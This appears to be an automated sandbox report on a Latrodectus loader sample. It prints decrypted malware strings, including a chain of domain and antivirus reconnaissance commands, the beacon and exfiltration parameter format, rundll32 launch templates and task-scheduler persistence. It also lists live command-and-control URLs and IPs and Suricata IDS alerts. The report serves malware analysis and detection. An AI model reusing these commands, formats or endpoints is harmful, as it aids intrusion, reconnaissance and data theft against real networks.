Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c systeminfo
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net view /all
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &ipconfig=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net config workstation
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &systeminfo=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain_trusts_all=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_view_all=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_group=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &wmic=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &whoami_group=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "pid":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%d",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "proc":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &proclist=[
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "pid":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%d",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "proc":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &desklinks=[
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s"
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Update_%x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Custom_update
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Error
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: runnung
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s/%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: front
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /files/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Lambda
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Cookie:
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: POST
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: GET
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: CLEARURL
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: URLS
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: COMMAND
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: ERROR
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: [{"data":"
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "}]
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &dpost=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: https://reateberam.com/test/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: https://dogirafer.com/test/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \*.dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: AppData
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Desktop
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Startup
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Personal
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Local AppData
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: <html>
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s%d.dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: 12345
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: 12345
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &stiller=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s%d.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %x%x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &mac=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %02x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: :%02x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &computername=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: LogonTrigger
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: TimeTrigger
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: PT0S
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \update_data.dat

Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D5E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,	9_2_0B8D5E5C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D5FE4 CryptUnprotectData,	9_2_0B8D5FE4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,	9_2_0B8D6078
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,	9_2_0B8D453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D8568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,	9_2_0B8D8568

Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49967 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr
Source:	Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmp, wait.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00C4B02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	5_2_00007FFDFA922E90
Source: C:\Windows\explorer.exe	Code function: 9_2_0137A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0137A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_01372B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_01372B28
Source: C:\Windows\explorer.exe	Code function: 9_2_013804C0 FindFirstFileW,	9_2_013804C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D16F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0B8D16F4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0B8D6604

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49865 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49885 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49873 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49904 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49914 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49879 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49929 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49940 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49934 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49953 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49974 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49962 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49956 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49946 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49967 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50013 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49982 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50020 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50027 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50034 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49988 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50037 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50043 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50033 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50038 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50049 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50051 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50035 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50039 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50053 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50046 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50036 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49997 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50045 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50048 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50040 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50054 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50052 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50050 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50044 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50041 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50047 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50042 -> 104.21.16.251:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.251 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://reateberam.com/test/
Source: Malware configuration extractor	URLs: https://dogirafer.com/test/

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 103.57.249.207:6542

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49873 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49879 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49929 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49967 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49974 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49982 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49988 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49997 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50013 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 104.21.68.89:443
